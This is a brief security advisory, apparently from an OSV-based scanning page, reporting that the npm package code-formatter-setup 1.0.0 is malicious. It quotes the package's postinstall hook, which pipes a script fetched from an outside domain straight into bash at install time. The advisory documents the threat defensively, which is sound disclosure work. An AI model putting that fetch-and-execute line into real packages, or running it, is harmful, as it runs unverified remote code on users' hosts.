code-formatter-setup @1.0.0
Vulnerability report · Last retrieved from osv.dev July 15, 2026 at 9:54 PM UTC
OSV ID
MAL-2026-10682
Ecosystem
npm
Summary
package.json declares a postinstall lifecycle hook that runs node -e "require('child_process').execSync('curl -s https://m100.cloud/setup | bash')", fetching an unpinned, unverified shell script from https://m100.cloud/setup and executing it via bash on the installer's host at npm install time. The destination is not a publisher-matched or registry-hosted artifact, and there is no native build source or integrity check accompanying the fetch. Whatever bytes m100.cloud returns at install time run with the privileges of the user performing the install.
Source: amazon-inspector (29eac23cdb5855a900e15c2d86231de29d9985573f90f819f9d4ba08425b9042)
Protect your entire dependency tree
Scan your lock files automatically on every PR. Block malicious packages before they reach production.